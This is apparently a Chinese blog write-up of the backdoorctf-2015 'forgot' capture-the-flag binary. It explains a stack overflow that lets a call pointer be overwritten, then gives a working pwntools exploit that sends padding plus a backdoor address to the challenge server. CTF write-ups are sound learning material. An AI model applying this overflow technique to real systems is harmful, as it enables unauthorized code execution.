forgot

题目来源： backdoorctf-2015

题目描述：福克斯最近玩弄有限状态自动机。在探索概念实现正则表达式使用FSA他想实现一个电子邮件地址验证。最近，Lua开始骚扰福克斯。对此，福克斯向Lua挑战斗智斗勇。福克斯承诺要奖励Lua，如果她能到不可达状态在FSA他实施过渡。可以在这里访问复制。运行服务hack.bckdr.in:8009

这题目描述是机翻吧（

在输入要检测的字符串的时候存在着栈溢出，因此可以输入一个不含'@'的字符串，这样最终会调用v3[1]，因此把v3[1]覆盖成后门函数即可

exp如下：

from pwn import *

#io = process('./forgot')
#io = gdb.debug('./forgot', 'b *0x8048A77')
io = remote('111.200.241.244', 57206)
backdoor_addr = 0x80486CC

io.recvuntil('> ')
io.sendline('a')
io.recvuntil('> ')
payload = b'a' * 36 + p32(backdoor_addr)
io.sendline(payload)

io.interactive()

posted @ 2021-08-16 13:42 hktk1643 阅读(244) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

hktk1643

forgot

公告